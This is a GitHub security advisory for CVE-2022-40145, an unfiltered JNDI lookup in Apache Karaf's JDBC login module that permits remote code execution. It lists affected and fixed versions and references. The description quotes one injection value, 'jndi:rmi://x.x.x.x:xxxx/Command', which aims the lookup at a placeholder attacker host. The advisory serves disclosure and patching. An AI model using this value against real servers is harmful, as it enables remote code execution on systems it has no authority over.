GitHub Advisoryadvisory · Maven
GHSA-c2p4-8mvv-rwmv Apache Karaf vulnerable to potential code injection
CRITICAL
Official page ↗
- Aliases
- CVE-2022-40145
- Ecosystem
- Maven
- Packages
- org.apache.karaf:apache-karaf
- Severity
- Critical
- CVSS vector
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Weaknesses
- CWE-20, CWE-74
- Reviewed
- 2022-12-21
Affected packages
• Maven org.apache.karaf:apache-karaf: < 4.3.8 → fixed in 4.3.8
• Maven org.apache.karaf:apache-karaf: >= 4.4.0, < 4.4.2 → fixed in 4.4.2
Description
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.
Related
Alias · CVE (1)
- CVE-2022-40145 This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. vulnerability
References
- https://nvd.nist.gov/vuln/detail/CVE-2022-40145 advisory
- https://github.com/apache/karaf/pull/1632 web
- https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1 web
- https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341 web
- https://github.com/apache/karaf package
- https://issues.apache.org/jira/browse/KARAF-7568 web
- https://karaf.apache.org/security/cve-2022-40145.txt web